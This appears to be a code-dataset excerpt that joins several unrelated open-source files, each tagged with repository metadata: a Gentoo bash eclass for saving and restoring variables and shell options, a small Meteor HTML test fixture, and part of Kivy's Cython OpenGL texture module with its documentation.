# copy of "i" rather than the caller's copy. The _estack_xxx
# garbage is preferable to using $1/$2 everywhere as that is a
# bit harder to read.
local _estack_name="_ESTACK_$1_" ; shift
local _estack_retvar=$1 ; shift
eval local _estack_i=\${#${_estack_name}\[@\]}
# Don't warn -- let the caller interpret this as a failure
# or as normal behavior (akin to `shift`)
[[ $(( --_estack_i )) -eq -1 ]] && return 1
if [[ -n ${_estack_retvar} ]] ; then
eval ${_estack_retvar}=\"\${${_estack_name}\[${_estack_i}\]}\"
fi
eval unset \"${_estack_name}\[${_estack_i}\]\"
}
# @FUNCTION: evar_push
# @USAGE: <variable to save> [more vars to save]
# @DESCRIPTION:
# This let's you temporarily modify a variable and then restore it (including
# set vs unset semantics). Arrays are not supported at this time.
#
# This is meant for variables where using `local` does not work (such as
# exported variables, or only temporarily changing things in a func).
#
# For example:
# @CODE
# evar_push LC_ALL
# export LC_ALL=C
# ... do some stuff that needs LC_ALL=C set ...
# evar_pop
#
# # You can also save/restore more than one var at a time
# evar_push BUTTERFLY IN THE SKY
# ... do stuff with the vars ...
# evar_pop # This restores just one var, SKY
# ... do more stuff ...
# evar_pop 3 # This pops the remaining 3 vars
# @CODE
evar_push() {
local var val
for var ; do
[[ ${!var+set} == "set" ]] \
&& val=${!var} \
|| val="unset_76fc3c462065bb4ca959f939e6793f94"
estack_push evar "${var}" "${val}"
done
}
# @FUNCTION: evar_push_set
# @USAGE: <variable to save> [new value to store]
# @DESCRIPTION:
# This is a handy shortcut to save and temporarily set a variable. If a value
# is not specified, the var will be unset.
evar_push_set() {
local var=$1
evar_push ${var}
case $# in
1) unset ${var} ;;
2) printf -v "${var}" '%s' "$2" ;;
*) die "${FUNCNAME}: incorrect # of args: $*" ;;
esac
}
# @FUNCTION: evar_pop
# @USAGE: [number of vars to restore]
# @DESCRIPTION:
# Restore the variables to the state saved with the corresponding
# evar_push call. See that function for more details.
evar_pop() {
local cnt=${1:-bad}
case $# in
0) cnt=1 ;;
1) isdigit "${cnt}" || die "${FUNCNAME}: first arg must be a number: $*" ;;
*) die "${FUNCNAME}: only accepts one arg: $*" ;;
esac
local var val
while (( cnt-- )) ; do
estack_pop evar val || die "${FUNCNAME}: unbalanced push"
estack_pop evar var || die "${FUNCNAME}: unbalanced push"
[[ ${val} == "unset_76fc3c462065bb4ca959f939e6793f94" ]] \
&& unset ${var} \
|| printf -v "${var}" '%s' "${val}"
done
}
# @FUNCTION: eshopts_push
# @USAGE: [options to `set` or `shopt`]
# @DESCRIPTION:
# Often times code will want to enable a shell option to change code behavior.
# Since changing shell options can easily break other pieces of code (which
# assume the default state), eshopts_push is used to (1) push the current shell
# options onto a stack and (2) pass the specified arguments to set.
#
# If the first argument is '-s' or '-u', we assume you want to call `shopt`
# rather than `set` as there are some options only available via that.
#
# A common example is to disable shell globbing so that special meaning/care
# may be used with variables/arguments to custom functions. That would be:
# @CODE
# eshopts_push -o noglob
# for x in ${foo} ; do
# if ...some check... ; then
# eshopts_pop
# return 0
# fi
# done
# eshopts_pop
# @CODE
eshopts_push() {
if [[ $1 == -[su] ]] ; then
estack_push eshopts "$(shopt -p)"
[[ $# -eq 0 ]] && return 0
shopt "$@" || die "${FUNCNAME}: bad options to shopt: $*"
else
estack_push eshopts "$(shopt -p -o)"
[[ $# -eq 0 ]] && return 0
set "$@" || die "${FUNCNAME}: bad options to set: $*"
fi
}
# @FUNCTION: eshopts_pop
# @USAGE:
# @DESCRIPTION:
# Restore the shell options to the state saved with the corresponding
# eshopts_push call. See that function for more details.
eshopts_pop() {
local s
estack_pop eshopts s || die "${FUNCNAME}: unbalanced push"
eval "${s}" || die "${FUNCNAME}: sanity: invalid shopt options: ${s}"
}
# @FUNCTION: eumask_push
# @USAGE: <new umask>
# @DESCRIPTION:
# Set the umask to the new value specified while saving the previous
# value onto a stack. Useful for temporarily changing the umask.
eumask_push() {
estack_push eumask "$(umask)"
umask "$@" || die "${FUNCNAME}: bad options to umask: $*"
}
# @FUNCTION: eumask_pop
# @USAGE:
# @DESCRIPTION:
# Restore the previous umask state.
eumask_pop() {
[[ $# -eq 0 ]] || die "${FUNCNAME}: we take no options"
local s
estack_pop eumask s || die "${FUNCNAME}: unbalanced push"
umask ${s} || die "${FUNCNAME}: sanity: could not restore umask: ${s}"
}
# @FUNCTION: isdigit
# @USAGE: <number> [more numbers]
# @DESCRIPTION:
# Return true if all arguments are numbers.
isdigit() {
local d
for d ; do
[[ ${d:-bad} == *[!0-9]* ]] && return 1
done
return 0
}
_ESTACK_ECLASS=1
fi #_ESTACK_ECLASS
| Gentoo Eclass | 5 | NighttimeDriver50000/Sabayon-Packages | local_overlay/eclass/estack.eclass | [
"MIT"
] |
<body>
<div class="app-lazy-css"></div>
<div class="app-eager-css"></div>
<div class="pkg-lazy-css imported"></div>
<div class="pkg-lazy-css not-imported"></div>
</body>
| HTML | 0 | joseconstela/meteor | tools/tests/apps/modules/lazy-css.html | [
"Apache-2.0",
"BSD-2-Clause",
"MIT"
] |
'''
Texture
=======
.. versionchanged:: 1.6.0
Added support for paletted texture on OES: 'palette4_rgb8',
'palette4_rgba8', 'palette4_r5_g6_b5', 'palette4_rgba4', 'palette4_rgb5_a1',
'palette8_rgb8', 'palette8_rgba8', 'palette8_r5_g6_b5', 'palette8_rgba4'
and 'palette8_rgb5_a1'.
:class:`Texture` is a class that handles OpenGL textures. Depending on the
hardware,
some OpenGL capabilities might not be available (BGRA support, NPOT support,
etc.)
You cannot instantiate this class yourself. You must use the function
:meth:`Texture.create` to create a new texture::
texture = Texture.create(size=(640, 480))
When you create a texture, you should be aware of the default color
and buffer format:
- the color/pixel format (:attr:`Texture.colorfmt`) that can be one of
'rgb', 'rgba', 'luminance', 'luminance_alpha', 'bgr' or 'bgra'.
The default value is 'rgb'
- the buffer format determines how a color component is stored into memory.
This can be one of 'ubyte', 'ushort', 'uint', 'byte', 'short', 'int' or
'float'. The default value and the most commonly used is 'ubyte'.
So, if you want to create an RGBA texture::
texture = Texture.create(size=(640, 480), colorfmt='rgba')
You can use your texture in almost all vertex instructions with the
:attr:`kivy.graphics.VertexIntruction.texture` parameter. If you want to use
your texture in kv lang, you can save it in an
:class:`~kivy.properties.ObjectProperty` inside your widget.
.. warning::
Using Texture before OpenGL has been initialized will lead to a crash. If
you need to create textures before the application has started, import
Window first: `from kivy.core.window import Window`
Blitting custom data
--------------------
You can create your own data and blit it to the texture using
:meth:`Texture.blit_buffer`.
For example, to blit immutable bytes data::
# create a 64x64 texture, defaults to rgba / ubyte
texture = Texture.create(size=(64, 64))
# create 64x64 rgb tab, and fill with values from 0 to 255
# we'll have a gradient from black to white
size = 64 * 64 * 3
buf = [int(x * 255 / size) for x in range(size)]
# then, convert the array to a ubyte string
buf = bytes(buf)
# then blit the buffer
texture.blit_buffer(buf, colorfmt='rgb', bufferfmt='ubyte')
# that's all ! you can use it in your graphics now :)
# if self is a widget, you can do this
with self.canvas:
Rectangle(texture=texture, pos=self.pos, size=(64, 64))
Since 1.9.0, you can blit data stored in a instance that implements the python
buffer interface, or a memoryview thereof, such as numpy arrays, python
`array.array`, a `bytearray`, or a cython array. This is beneficial if you
expect to blit similar data, with perhaps a few changes in the data.
When using a bytes representation of the data, for every change you have to
regenerate the bytes instance, from perhaps a list, which is very inefficient.
When using a buffer object, you can simply edit parts of the original data.
Similarly, unless starting with a bytes object, converting to bytes requires a
full copy, however, when using a buffer instance, no memory is copied, except
to upload it to the GPU.
Continuing with the example above::
from array import array
size = 64 * 64 * 3
buf = [int(x * 255 / size) for x in range(size)]
# initialize the array with the buffer values
arr = array('B', buf)
# now blit the array
texture.blit_buffer(arr, colorfmt='rgb', bufferfmt='ubyte')
# now change some elements in the original array
arr[24] = arr[50] = 99
# blit again the buffer
texture.blit_buffer(arr, colorfmt='rgb', bufferfmt='ubyte')
BGR/BGRA support
----------------
The first time you try to create a BGR or BGRA texture, we check whether
your hardware supports BGR / BGRA textures by checking the extension
'GL_EXT_bgra'.
If the extension is not found, the conversion to RGB / RGBA will be done in
software.
NPOT texture
------------
.. versionchanged:: 1.0.7
If your hardware supports NPOT, no POT is created.
As the OpenGL documentation says, a texture must be power-of-two sized. That
means
your width and height can be one of 64, 32, 256... but not 3, 68, 42. NPOT means
non-power-of-two. OpenGL ES 2 supports NPOT textures natively but with some
drawbacks. Another type of NPOT texture is called a rectangle texture.
POT, NPOT and textures all have their own pro/cons.
================= ============= ============= =================================
Features POT NPOT Rectangle
----------------- ------------- ------------- ---------------------------------
OpenGL Target GL_TEXTURE_2D GL_TEXTURE_2D GL_TEXTURE_RECTANGLE_(NV|ARB|EXT)
Texture coords 0-1 range 0-1 range width-height range
Mipmapping Supported Partially No
Wrap mode Supported Supported No
================= ============= ============= =================================
If you create a NPOT texture, we first check whether your hardware
supports it by checking the extensions GL_ARB_texture_non_power_of_two or
OES_texture_npot. If none of these are available, we create the nearest
POT texture that can contain your NPOT texture. The :meth:`Texture.create` will
return a :class:`TextureRegion` instead.
Texture atlas
-------------
A texture atlas is a single texture that contains many images.
If you want to separate the original texture into many single ones, you don't
need to. You can get a region of the original texture. That will return the
original texture with custom texture coordinates::
# for example, load a 128x128 image that contain 4 64x64 images
from kivy.core.image import Image
texture = Image('mycombinedimage.png').texture
bottomleft = texture.get_region(0, 0, 64, 64)
bottomright = texture.get_region(0, 64, 64, 64)
topleft = texture.get_region(0, 64, 64, 64)
topright = texture.get_region(64, 64, 64, 64)
.. _mipmap:
Mipmapping
----------
.. versionadded:: 1.0.7
Mipmapping is an OpenGL technique for enhancing the rendering of large textures
to small surfaces. Without mipmapping, you might see pixelation when you
render to small surfaces.
The idea is to precalculate the subtexture and apply some image filter as a
linear filter. Then, when you render a small surface, instead of using the
biggest texture, it will use a lower filtered texture. The result can look
better this way.
To make that happen, you need to specify mipmap=True when you create a
texture. Some widgets already give you the ability to create mipmapped
textures, such as the :class:`~kivy.uix.label.Label` and
:class:`~kivy.uix.image.Image`.
From the OpenGL Wiki : "So a 64x16 2D texture can have 5 mip-maps: 32x8, 16x4,
8x2, 4x1, 2x1, and 1x1". Check http://www.opengl.org/wiki/Texture for more
information.
.. note::
As the table in previous section said, if your texture is NPOT, we
create the nearest POT texture and generate a mipmap from it. This
might change in the future.
Reloading the Texture
---------------------
.. versionadded:: 1.2.0
If the OpenGL context is lost, the Texture must be reloaded. Textures that have
a source are automatically reloaded but generated textures must
be reloaded by the user.
Use the :meth:`Texture.add_reload_observer` to add a reloading function that
will be automatically called when needed::
def __init__(self, **kwargs):
super(...).__init__(**kwargs)
self.texture = Texture.create(size=(512, 512), colorfmt='RGB',
bufferfmt='ubyte')
self.texture.add_reload_observer(self.populate_texture)
# and load the data now.
self.cbuffer = '\\x00\\xf0\\xff' * 512 * 512
self.populate_texture(self.texture)
def populate_texture(self, texture):
texture.blit_buffer(self.cbuffer)
This way, you can use the same method for initialization and reloading.
.. note::
For all text rendering with our core text renderer, the texture is generated
but we already bind a method to redo the text rendering and reupload
the text to the texture. You don't have to do anything.
'''
__all__ = ('Texture', 'TextureRegion')
include "../include/config.pxi"
include "common.pxi"
include "opengl_utils_def.pxi"
include "img_tools.pxi"
include "gl_debug_logger.pxi"
cimport cython
from os import environ
from kivy.utils import platform
from kivy.weakmethod import WeakMethod
from kivy.graphics.context cimport get_context
cimport kivy.graphics.cgl as cgldef
from kivy.graphics.cgl cimport *
from kivy.graphics.opengl_utils cimport gl_has_capability, gl_get_version_major
cdef int gles_limts = int(environ.get(
'KIVY_GLES_LIMITS', int(platform not in ('win', 'macosx', 'linux'))))
# update flags
cdef int TI_MIN_FILTER = 1 << 0
cdef int TI_MAG_FILTER = 1 << 1
cdef int TI_WRAP = 1 << 2
cdef int TI_NEED_GEN = 1 << 3
cdef int TI_NEED_ALLOCATE = 1 << 4
cdef int TI_NEED_PIXELS = 1 << 5
# compatibility layer
DEF GL_BGR = 0x80E0
DEF GL_BGRA = 0x80E1
DEF GL_COMPRESSED_RGBA_S3TC_DXT1_EXT = 0x83F1
DEF GL_COMPRESSED_RGBA_S3TC_DXT3_EXT = 0x83F2
DEF GL_COMPRESSED_RGBA_S3TC_DXT5_EXT = 0x83F3
DEF GL_ETC1_RGB8_OES = 0x8D64
DEF GL_PALETTE4_RGB8_OES = 0x8B90
DEF GL_PALETTE4_RGBA8_OES = 0x8B91
DEF GL_PALETTE4_R5_G6_B5_OES = 0x8B92
DEF GL_PALETTE4_RGBA4_OES = 0x8B93
DEF GL_PALETTE4_RGB5_A1_OES = 0x8B94
DEF GL_PALETTE8_RGB8_OES = 0x8B95
DEF GL_PALETTE8_RGBA8_OES = 0x8B96
DEF GL_PALETTE8_R5_G6_B5_OES = 0x8B97
DEF GL_PALETTE8_RGBA4_OES = 0x8B98
DEF GL_PALETTE8_RGB5_A1_OES = 0x8B99
DEF GL_COMPRESSED_RGB_PVRTC_4BPPV1_IMG = 0x8C00
DEF GL_COMPRESSED_RGB_PVRTC_2BPPV1_IMG = 0x8C01
DEF GL_COMPRESSED_RGBA_PVRTC_4BPPV1_IMG = 0x8C02
DEF GL_COMPRESSED_RGBA_PVRTC_2BPPV1_IMG = 0x8C03
DEF GL_RED = 0x1903
DEF GL_RG = 0x8227
DEF GL_R8 = 0x8229
DEF GL_RG8 = 0x822B
DEF GL_RGBA8 = 0x8058
DEF GL_UNPACK_ROW_LENGTH = 0x0CF2
DEF GL_UNPACK_SKIP_ROWS = 0x0CF3
DEF GL_UNPACK_SKIP_PIXELS = 0x0CF4
cdef dict _gl_color_fmt = {
'rgba': GL_RGBA, 'bgra': GL_BGRA, 'rgb': GL_RGB, 'bgr': GL_BGR,
'luminance': GL_LUMINANCE, 'luminance_alpha': GL_LUMINANCE_ALPHA,
's3tc_dxt1': GL_COMPRESSED_RGBA_S3TC_DXT1_EXT,
's3tc_dxt3': GL_COMPRESSED_RGBA_S3TC_DXT3_EXT,
's3tc_dxt5': GL_COMPRESSED_RGBA_S3TC_DXT5_EXT,
'etc1_rgb8': GL_ETC1_RGB8_OES,
'palette4_rgb8': GL_PALETTE4_RGB8_OES,
'palette4_rgba8': GL_PALETTE4_RGBA8_OES,
'palette4_r5_g6_b5': GL_PALETTE4_R5_G6_B5_OES,
'palette4_rgba4': GL_PALETTE4_RGBA4_OES,
'palette4_rgb5_a1': GL_PALETTE4_RGB5_A1_OES,
'palette8_rgb8': GL_PALETTE8_RGB8_OES,
'palette8_rgba8': GL_PALETTE8_RGBA8_OES,
'palette8_r5_g6_b5': GL_PALETTE8_R5_G6_B5_OES,
'palette8_rgba4': GL_PALETTE8_RGBA4_OES,
'palette8_rgb5_a1': GL_PALETTE8_RGB5_A1_OES,
'pvrtc_rgba2': GL_COMPRESSED_RGBA_PVRTC_2BPPV1_IMG,
'pvrtc_rgba4': GL_COMPRESSED_RGBA_PVRTC_4BPPV1_IMG,
'pvrtc_rgb2': GL_COMPRESSED_RGB_PVRTC_2BPPV1_IMG,
'pvrtc_rgb4': GL_COMPRESSED_RGB_PVRTC_4BPPV1_IMG,
'red': GL_RED, 'rg': GL_RG,
'r8': GL_R8, 'rg8': GL_RG8, 'rgba8': GL_RGBA8}
cdef dict _gl_buffer_fmt = {
'ubyte': GL_UNSIGNED_BYTE, 'ushort': GL_UNSIGNED_SHORT,
'uint': GL_UNSIGNED_INT, 'byte': GL_BYTE,
'short': GL_SHORT, 'int': GL_INT, 'float': GL_FLOAT}
cdef dict _gl_buffer_size = {
'ubyte': sizeof(GLubyte), 'ushort': sizeof(GLushort),
'uint': sizeof(GLuint), 'byte': sizeof(GLbyte),
'short': sizeof(GLshort), 'int': sizeof(GLint),
'float': sizeof(GLfloat) }
cdef dict _gl_texture_min_filter = {
'nearest': GL_NEAREST, 'linear': GL_LINEAR,
'nearest_mipmap_nearest': GL_NEAREST_MIPMAP_NEAREST,
'nearest_mipmap_linear': GL_NEAREST_MIPMAP_LINEAR,
'linear_mipmap_nearest': GL_LINEAR_MIPMAP_NEAREST,
'linear_mipmap_linear': GL_LINEAR_MIPMAP_LINEAR }
cdef inline int _nearest_pow2(int v):
# From http://graphics.stanford.edu/~seander/bithacks.html#RoundUpPowerOf2
# Credit: Sean Anderson
v -= 1
v |= v >> 1
v |= v >> 2
v |= v >> 4
v |= v >> 8
v |= v >> 16
return v + 1
cdef inline int _is_pow2(int v):
# http://graphics.stanford.edu/~seander/bithacks.html#DetermineIfPowerOf2
return (v & (v - 1)) == 0
cdef inline int _color_fmt_to_gl(x):
'''Return the GL numeric value from a color string format.
'''
x = x.lower()
try:
return _gl_color_fmt[x]
except KeyError:
raise Exception('Unknown <%s> color format' % x)
cdef inline int _is_compressed_fmt(x):
'''Return 1 if the color string format is a compressed one.
'''
if x.startswith('palette'):
return 1
if x.startswith('pvrtc_'):
return 1
if x.startswith('etc1_'):
return 1
return x.startswith('s3tc_dxt')
cdef inline int _buffer_fmt_to_gl(x):
'''Return the GL numeric value from a buffer string format.
'''
x = x.lower()
try:
return _gl_buffer_fmt[x]
except KeyError:
raise Exception('Unknown <%s> buffer format' % x)
cdef inline int _buffer_type_to_gl_size(x):
'''Return the size of a buffer string format in str.
'''
x = x.lower()
try:
return _gl_buffer_size[x]
except KeyError:
raise Exception('Unknown <%s> format' % x)
cdef inline GLuint _str_to_gl_texture_min_filter(x):
'''Return the GL numeric value from a texture min filter string.
'''
x = x.lower()
try:
return _gl_texture_min_filter[x]
except KeyError:
raise Exception('Unknown <%s> texture min filter' % x)
cdef inline GLuint _str_to_gl_texture_mag_filter(x):
'''Return the GL numeric value from a texture mag filter string.
'''
x = x.lower()
if x == 'nearest':
return GL_NEAREST
elif x == 'linear':
return GL_LINEAR
raise Exception('Unknown <%s> texture mag filter' % x)
cdef inline GLuint _str_to_gl_texture_wrap(x):
'''Return the GL numeric value from a texture wrap string.
'''
if x == 'clamp_to_edge':
return GL_CLAMP_TO_EDGE
elif x == 'repeat':
return GL_REPEAT
elif x == 'mirrored_repeat':
return GL_MIRRORED_REPEAT
cdef inline int _gl_format_size(GLuint x):
'''Return the GL numeric value from a texture wrap string.
'''
if x in (GL_RGB, GL_BGR):
return 3
elif x in (GL_RGBA, GL_BGRA):
return 4
elif x in (GL_LUMINANCE_ALPHA, GL_RG):
return 2
elif x in (GL_LUMINANCE, GL_RED):
return 1
elif x in (GL_COMPRESSED_RGBA_S3TC_DXT1_EXT,
GL_COMPRESSED_RGBA_S3TC_DXT3_EXT,
GL_COMPRESSED_RGBA_S3TC_DXT5_EXT):
return 4
raise Exception('Unsupported format size <%s>' % str(format))
cdef inline int _is_gl_format_supported(x):
if x in ('bgr', 'bgra'):
return gl_has_capability(GLCAP_BGRA)
elif x == 's3tc_dxt1':
return gl_has_capability(GLCAP_DXT1)
elif x.startswith('s3tc_dxt'):
return gl_has_capability(GLCAP_S3TC)
elif x.startswith('etc1_'):
return gl_has_capability(GLCAP_ETC1)
return 1
cdef inline str _convert_gl_format(x):
if x == 'bgr':
return 'rgb'
elif x == 'bgra':
return 'rgba'
return x
cdef inline void _gl_prepare_pixels_upload(int width) nogil:
'''Set the best pixel alignment for the current width.
'''
if not (width & 0x7):
cgl.glPixelStorei(GL_UNPACK_ALIGNMENT, 8)
elif not (width & 0x3):
cgl.glPixelStorei(GL_UNPACK_ALIGNMENT, 4)
elif not (width & 0x1):
cgl.glPixelStorei(GL_UNPACK_ALIGNMENT, 2)
else:
cgl.glPixelStorei(GL_UNPACK_ALIGNMENT, 1)
cdef Texture _texture_create(int width, int height, colorfmt, bufferfmt,
int mipmap, int allocate, object callback, object icolorfmt):
'''Create the OpenGL texture.
'''
cdef GLuint target = GL_TEXTURE_2D
cdef GLuint texid = 0
cdef Texture texture
cdef int texture_width, texture_height
cdef int glbufferfmt = _buffer_fmt_to_gl(bufferfmt)
cdef int make_npot = 0
# check if it's a pot or not
if not _is_pow2(width) or not _is_pow2(height):
make_npot = 1
if not cgldef.kivy_opengl_es2:
if gl_get_version_major() < 3:
mipmap = 0
# in case of mipmap is asked for npot texture, make it pot compatible
if mipmap:
make_npot = 0
allocate = 1
# depending if npot is available, use the real size or pot size
if make_npot and gl_has_capability(c_GLCAP_NPOT):
texture_width = width
texture_height = height
else:
texture_width = _nearest_pow2(width)
texture_height = _nearest_pow2(height)
# create the texture with the future color format.
icolorfmt = _convert_gl_format(icolorfmt)
texture = Texture(texture_width, texture_height, target,
colorfmt=colorfmt, bufferfmt=bufferfmt, mipmap=mipmap,
callback=callback, icolorfmt=icolorfmt)
if allocate or make_npot:
texture.flags |= TI_NEED_ALLOCATE
# set default parameter for this texture
texture.set_wrap('clamp_to_edge')
if mipmap:
texture.set_min_filter('linear_mipmap_nearest')
texture.set_mag_filter('linear')
else:
texture.set_min_filter('linear')
texture.set_mag_filter('linear')
# if the texture size is the same as initial size, return the texture
# unmodified
if texture_width == width and texture_height == height:
return texture
# otherwise, return a region of that texture
return texture.get_region(0, 0, width, height)
def texture_create(size=None, colorfmt=None, bufferfmt=None, mipmap=False,
callback=None, icolorfmt=None):
'''Create a texture based on size.
:Parameters:
`size`: tuple, defaults to (128, 128)
Size of the texture.
`colorfmt`: str, defaults to 'rgba'
Color format of the texture. Can be 'rgba' or 'rgb',
'luminance' or 'luminance_alpha'. On desktop, additional values are
available: 'red', 'rg'.
`icolorfmt`: str, defaults to the value of `colorfmt`
Internal format storage of the texture. Can be 'rgba' or 'rgb',
'luminance' or 'luminance_alpha'. On desktop, additional values are
available: 'r8', 'rg8', 'rgba8'.
`bufferfmt`: str, defaults to 'ubyte'
Internal buffer format of the texture. Can be 'ubyte', 'ushort',
'uint', 'bute', 'short', 'int' or 'float'.
`mipmap`: bool, defaults to False
If True, it will automatically generate the mipmap texture.
`callback`: callable(), defaults to False
If a function is provided, it will be called when data is
needed in the texture.
.. versionchanged:: 1.7.0
:attr:`callback` has been added
'''
cdef int width = 128, height = 128, allocate = 1
if size is not None:
width, height = size
if colorfmt is None:
colorfmt = 'rgba'
if bufferfmt is None:
bufferfmt = 'ubyte'
if callback is not None:
allocate = 0
if icolorfmt is None:
icolorfmt = colorfmt
return _texture_create(width, height, colorfmt, bufferfmt, mipmap,
allocate, callback, icolorfmt)
def texture_create_from_data(im, mipmap=False):
'''Create a texture from an ImageData class.
'''
cdef int width = im.width
cdef int height = im.height
cdef int allocate = 1
cdef int no_blit = 0
cdef Texture texture
# optimization, if the texture is power of 2, don't allocate in
# _texture_create, but allocate in blit_data => only 1 upload
if _is_pow2(width) and _is_pow2(height):
allocate = 0
elif gl_has_capability(c_GLCAP_NPOT):
allocate = 0
# if imagedata have more than one image, activate mipmap
if im.have_mipmap:
mipmap = True
if not cgldef.kivy_opengl_es2:
if gl_get_version_major() < 3:
mipmap = False
if width == 0 or height == 0:
height = width = 1
allocate = 1
no_blit = 1
texture = _texture_create(width, height, im.fmt, 'ubyte', mipmap, allocate,
None, im.fmt)
if texture is None:
return None
texture._source = im.source
if no_blit == 0:
texture.blit_data(im)
return texture
cdef class Texture:
'''Handle an OpenGL texture. This class can be used to create simple
textures or complex textures based on ImageData.'''
_sequenced_textures = {}
'''Internal use only for textures of sequenced images
'''
create = staticmethod(texture_create)
create_from_data = staticmethod(texture_create_from_data)
def __init__(self, width, height, target, texid=0, colorfmt='rgb',
bufferfmt='ubyte', mipmap=False, source=None, callback=None,
icolorfmt='rgb'):
self.observers = []
self._width = width
self._height = height
self._target = target
self._id = texid
self._mipmap = mipmap
self._wrap = None
self._min_filter = None
self._mag_filter = None
self._is_allocated = 0
self._uvx = 0.
self._uvy = 0.
self._uvw = 1.
self._uvh = 1.
self._colorfmt = colorfmt
self._bufferfmt = bufferfmt
self._icolorfmt = icolorfmt
self._source = source
self._nofree = 0
self._callback = callback
if texid == 0:
self.flags |= TI_NEED_GEN
if callback is not None:
self.flags |= TI_NEED_PIXELS
self.update_tex_coords()
get_context().register_texture(self)
def __dealloc__(self):
get_context().dealloc_texture(self)
cdef void update_tex_coords(self):
self._tex_coords[0] = self._uvx
self._tex_coords[1] = self._uvy
self._tex_coords[2] = self._uvx + self._uvw
self._tex_coords[3] = self._uvy
self._tex_coords[4] = self._uvx + self._uvw
self._tex_coords[5] = self._uvy + self._uvh
self._tex_coords[6] = self._uvx
self._tex_coords[7] = self._uvy + self._uvh
def add_reload_observer(self, callback):
'''Add a callback to be called after the whole graphics context has
been reloaded. This is where you can reupload your custom data into
the GPU.
.. versionadded:: 1.2.0
:Parameters:
`callback`: func(context) -> return None
The first parameter will be the context itself.
'''
self.observers.append(WeakMethod(callback))
def remove_reload_observer(self, callback):
'''Remove a callback from the observer list, previously added by
:meth:`add_reload_observer`.
.. versionadded:: 1.2.0
'''
for cb in self.observers[:]:
method = cb()
if method is None or method is callback:
self.observers.remove(cb)
continue
cdef void allocate(self):
cdef int iglfmt, glfmt, iglbufferfmt, datasize, dataerr = 0
cdef void *data = NULL
cdef int is_npot = 0
# check if it's a pot or not
if not _is_pow2(self._width) or not _is_pow2(self._height):
make_npot = is_npot = 1
# prepare information needed for nogil
glfmt = _color_fmt_to_gl(self._colorfmt)
iglfmt = _color_fmt_to_gl(self._icolorfmt)
iglbufferfmt = _buffer_fmt_to_gl(self._bufferfmt)
datasize = self._width * self._height * \
_gl_format_size(glfmt) * _buffer_type_to_gl_size(self._bufferfmt)
# act as we have been able to allocate the texture
self._is_allocated = 1
# do the rest outside the Python GIL
with nogil:
data = calloc(1, datasize)
if data != NULL:
# ensure pixel upload is correct
_gl_prepare_pixels_upload(self._width)
# do the initial upload with fake data
cgl.glTexImage2D(self._target, 0, iglfmt, self._width, self._height,
0, glfmt, iglbufferfmt, data)
# free the data !
free(data)
# create mipmap if needed
if self._mipmap and is_npot == 0:
cgl.glGenerateMipmap(self._target)
else:
dataerr = 1
if dataerr:
self._is_allocated = 0
raise Exception('Unable to allocate memory for texture (size is %s)' %
datasize)
cpdef flip_vertical(self):
'''Flip tex_coords for vertical display.'''
self._uvy += self._uvh
self._uvh = -self._uvh
self.update_tex_coords()
cpdef flip_horizontal(self):
'''Flip tex_coords for horizontal display.
.. versionadded:: 1.9.0
'''
self._uvx += self._uvw
self._uvw = -self._uvw
self.update_tex_coords()
cpdef get_region(self, x, y, width, height):
'''Return a part of the texture defined by the rectangular arguments
(x, y, width, height). Returns a :class:`TextureRegion` instance.'''
return TextureRegion(x, y, width, height, self)
def ask_update(self, callback):
'''Indicate that the content of the texture should be updated and the
callback function needs to be called when the texture will be
used.
'''
self.flags |= TI_NEED_PIXELS
self._callback = callback
cpdef bind(self):
'''Bind the texture to the current opengl state.'''
cdef GLuint value
# if we have no change to apply, just bind and exit
if not self.flags:
cgl.glBindTexture(self._target, self._id)
log_gl_error('Texture.bind-glBindTexture')
return
if self.flags & TI_NEED_GEN:
self.flags &= ~TI_NEED_GEN
cgl.glGenTextures(1, &self._id)
log_gl_error('Texture.bind-glGenTextures')
cgl.glBindTexture(self._target, self._id)
log_gl_error('Texture.bind-glBindTexture')
if self.flags & TI_NEED_ALLOCATE:
self.flags &= ~TI_NEED_ALLOCATE
self.allocate()
if self.flags & TI_NEED_PIXELS:
self.flags &= ~TI_NEED_PIXELS
if self._callback:
self._callback(self)
self._callback = None
if self.flags & TI_MIN_FILTER:
self.flags &= ~TI_MIN_FILTER
value = _str_to_gl_texture_min_filter(self._min_filter)
cgl.glTexParameteri(self._target, GL_TEXTURE_MIN_FILTER, value)
log_gl_error('Texture.bind-glTexParameteri (GL_TEXTURE_MIN_FILTER)')
if self.flags & TI_MAG_FILTER:
self.flags &= ~TI_MAG_FILTER
value = _str_to_gl_texture_mag_filter(self._mag_filter)
cgl.glTexParameteri(self._target, GL_TEXTURE_MAG_FILTER, value)
log_gl_error('Texture.bind-glTexParameteri (GL_TEXTURE_MAG_FILTER')
if self.flags & TI_WRAP:
self.flags &= ~TI_WRAP
value = _str_to_gl_texture_wrap(self._wrap)
cgl.glTexParameteri(self._target, GL_TEXTURE_WRAP_S, value)
log_gl_error('Texture.bind-glTexParameteri (GL_TEXTURE_WRAP_S)')
cgl.glTexParameteri(self._target, GL_TEXTURE_WRAP_T, value)
log_gl_error('Texture.bind-glTexParameteri (GL_TEXTURE_WRAP_T')
cdef void set_min_filter(self, x):
if self._min_filter != x:
self._min_filter = x
self.flags |= TI_MIN_FILTER
cdef void set_mag_filter(self, x):
if self._mag_filter != x:
self._mag_filter = x
self.flags |= TI_MAG_FILTER
cdef void set_wrap(self, x):
if self._wrap != x:
self._wrap = x
self.flags |= TI_WRAP
def blit_data(self, im, pos=None):
'''Replace a whole texture with image data.
'''
blit = self.blit_buffer
# depending if imagedata have mipmap, think different.
if not im.have_mipmap:
blit(im.data, size=im.size, colorfmt=im.fmt, pos=pos,
rowlength=im.rowlength)
else:
# upload each level
for level, width, height, data, rowlength in im.iterate_mipmaps():
blit(data, size=(width, height),
colorfmt=im.fmt, pos=pos,
mipmap_level=level, mipmap_generation=False,
rowlength=rowlength)
@cython.cdivision(True)
def blit_buffer(self, pbuffer, size=None, colorfmt=None,
pos=None, bufferfmt=None, mipmap_level=0,
mipmap_generation=True, int rowlength=0):
'''Blit a buffer into the texture.
.. note::
Unless the canvas will be updated due to other changes,
:meth:`~kivy.graphics.instructions.Canvas.ask_update` should be
called in order to update the texture.
:Parameters:
`pbuffer`: bytes, or a class that implements the buffer interface\
(including memoryview).
A buffer containing the image data. It can be either a bytes
object or a instance of a class that implements the python
buffer interface, e.g. `array.array`, `bytearray`, numpy arrays
etc. If it's not a bytes object, the underlying buffer must
be contiguous, have only one dimension and must not be
readonly, even though the data is not modified, due to a cython
limitation. See module description for usage details.
`size`: tuple, defaults to texture size
Size of the image (width, height)
`colorfmt`: str, defaults to 'rgb'
Image format, can be one of 'rgb', 'rgba', 'bgr', 'bgra',
'luminance' or 'luminance_alpha'.
